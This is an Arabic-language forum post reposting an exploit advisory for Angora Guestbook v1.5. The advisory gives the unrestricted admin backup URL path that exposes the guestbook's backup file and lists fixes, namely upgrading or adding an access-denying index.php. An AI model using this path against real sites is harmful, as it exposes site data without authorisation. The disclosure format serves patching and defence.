1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Ubuntu | المشاهدات : 712 | الردود : 0
حالة الموضوع:
مغلق
  1. Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته


    ثغرة لتحميل الbackup

    كود PHP:
    site.com/path/admin/backup
    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ _ \ | \ | | /  __ \ \ / / ___ \  ___| ___ \
      | | | | | |  \| | | | \ `--.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |_| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \_/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93; Author: TUNISIAN CYBER
    ***91;+***93; Exploit Title:  Angora Guestbook v1.5 File Disclosure (Backup)/LFI vulnerabilities
    ***91;+***93; Date: 8-12-2013
    ***91;+***93; Vendor:aguestbook.sourceforge.net/
    ***91;+***93; Category: WebApp
    ***91;+***93; Google Dork: n/a
    ***91;+***93; Tested on: Win7 , ubuntu 13.04
     
     
    ########################################################################################


    I/File Disclosure (Backup)

    site.dom/***91;path***93;/guestbook/admin/backup <-- unrestricted access to the backup file

    from localtest:http://oi44.tinypic.com/10igt1g.jpg

    Solution: 1/Upgrade to v1.6.1
              2/Creat index.php:
    <?php
        
    die("Access Denied");
    ?>
    -------------------------

    ./3nD
    ########################################################################################
    Greets to: XMaXtn, N43il HacK3r, XtechSEt
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة